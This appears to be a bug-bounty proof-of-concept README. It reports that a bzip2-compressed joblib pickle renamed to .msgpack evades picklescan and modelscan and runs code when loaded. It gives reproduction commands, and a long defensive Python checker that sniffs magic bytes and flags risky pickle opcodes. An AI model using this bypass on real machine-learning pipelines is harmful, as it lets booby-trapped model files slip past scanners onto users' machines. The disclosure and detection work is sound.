MessagePack (.msgpack) MFV PoC - Authorized Security Research

Authorization: huntr.com / Protect AI MFV bug bounty program. All work local in a Python venv. Responsible disclosure only. Human-submitted.

Summary

  • Format: MessagePack (.msgpack)
  • Bypass: picklescan 1.0.4 + modelscan 0.8.8
  • Modes bypassed: all 4 (direct + directory scan for both scanners)
  • RCE via: joblib.load('malicious.msgpack')
  • Technique: bzip2-compressed joblib payload
  • Tested: 2026-06-25

Files

  • malicious.msgpack - bzip2-compressed joblib payload with .msgpack extension
  • poc-msgpack.py β€” reproduction script
  • README.md β€” this file

Reproduction

pip install picklescan modelscan joblib

python3 poc-msgpack.py

picklescan -p malicious.msgpack
picklescan -p .
modelscan  -p malicious.msgpack
modelscan  -p .

python3 -c "
import joblib
print('--- BEFORE LOAD ---')
joblib.load('malicious.msgpack')
print('--- AFTER LOAD ---')
"
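The finding above is that both scanners decide by file extension while joblib.load decides by content: a bzip2 container holding a pickle stream is opened regardless of what the filename claims. The following is an added defensive check, not one of the PoC files and not picklescan or modelscan code. It sniffs the leading bytes of an artifact, decompresses any bzip2/gzip/zlib/xz layer under a size cap, and reports whether a pickle stream (and which import/call opcodes) sits inside a file whose extension promises something else. The sample inputs are constructed here (a benign dict pickle wrapped in bzip2, and a hand-written msgpack map); the function names are this example's own.

```python
"""Content-sniffing gate for model artifacts: judge by bytes, not extension.

Added example for this README (not part of the PoC, not scanner code).
Assumes only the Python standard library.
"""
import bz2
import io
import lzma
import pickle
import pickletools
import zlib
from collections import OrderedDict

# Leading bytes of containers that joblib.load will transparently decompress.
MAGIC = {
    b"BZh": "bzip2",
    b"\x1f\x8b": "gzip",
    b"\xfd7zXZ\x00": "xz",
    b"\x78\x01": "zlib",
    b"\x78\x9c": "zlib",
    b"\x78\xda": "zlib",
}
# Pickle opcodes that import or call objects during unpickling.
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ",
                 "NEWOBJ", "NEWOBJ_EX", "BUILD"}
# Extensions for which a pickle stream is the expected content.
PICKLE_EXTS = {".pkl", ".pickle", ".joblib"}
MAX_DECOMPRESSED = 64 * 1024 * 1024  # cap so a bomb cannot exhaust memory


def detect_container(data: bytes):
    """Return the compression format named by the magic bytes, or None."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return None


def decompress_limited(data: bytes, kind: str) -> bytes:
    """Decompress one layer, refusing output larger than MAX_DECOMPRESSED."""
    if kind == "bzip2":
        dec = bz2.BZ2Decompressor()
    elif kind == "gzip":
        dec = zlib.decompressobj(wbits=31)   # gzip wrapper
    elif kind == "zlib":
        dec = zlib.decompressobj()
    elif kind == "xz":
        dec = lzma.LZMADecompressor()
    else:
        raise ValueError(f"unknown container {kind}")
    out = dec.decompress(data, MAX_DECOMPRESSED + 1)
    if len(out) > MAX_DECOMPRESSED:
        raise ValueError("decompressed payload exceeds size cap")
    return out


def pickle_opcodes(data: bytes):
    """Opcode names if `data` parses as a complete pickle stream, else None.

    Heuristic: genops must consume the bytes without error and reach STOP.
    A msgpack or other binary blob normally trips an unknown-opcode error.
    """
    names = set()
    try:
        for op, _arg, _pos in pickletools.genops(io.BytesIO(data)):
            names.add(op.name)
    except Exception:
        return None
    return names if "STOP" in names else None


def inspect_artifact(data: bytes, declared_ext: str) -> dict:
    """Classify raw artifact bytes against the type the extension declares."""
    findings = []
    container = detect_container(data)
    payload = data
    if container:
        findings.append(f"{container} container inside a {declared_ext} file")
        try:
            payload = decompress_limited(data, container)
        except ValueError as exc:
            findings.append(f"could not decompress: {exc}")
            return {"safe": False, "findings": findings}
    ops = pickle_opcodes(payload)
    if ops is not None:
        if declared_ext.lower() not in PICKLE_EXTS:
            findings.append(f"pickle stream disguised as {declared_ext}")
        risky = sorted(ops & RISKY_OPCODES)
        if risky:
            findings.append("risky opcodes: " + ", ".join(risky))
    return {"safe": not findings, "findings": findings}


# Constructed samples: a benign dict pickle in bzip2 (the page's shape, with a
# harmless payload) and a hand-encoded msgpack map {"a": 1, "b": 2}.
SAMPLE_DISGUISED = bz2.compress(pickle.dumps({"weights": [0.1, 0.2]}))
SAMPLE_MSGPACK = b"\x82\xa1a\x01\xa1b\x02"

if __name__ == "__main__":
    print(inspect_artifact(SAMPLE_DISGUISED, ".msgpack"))
    print(inspect_artifact(SAMPLE_MSGPACK, ".msgpack"))
    print(inspect_artifact(pickle.dumps(OrderedDict()), ".pkl"))
```

In practice the gate sits in front of the loader: read the file, call inspect_artifact with its extension, and only hand the path to joblib.load when the verdict is safe and the declared type matches the sniffed one. The opcode check is deliberately coarse (it flags any import or call, the same class of opcodes picklescan keys on); the point the PoC makes is that the check has to run on the decompressed bytes, whatever the filename says.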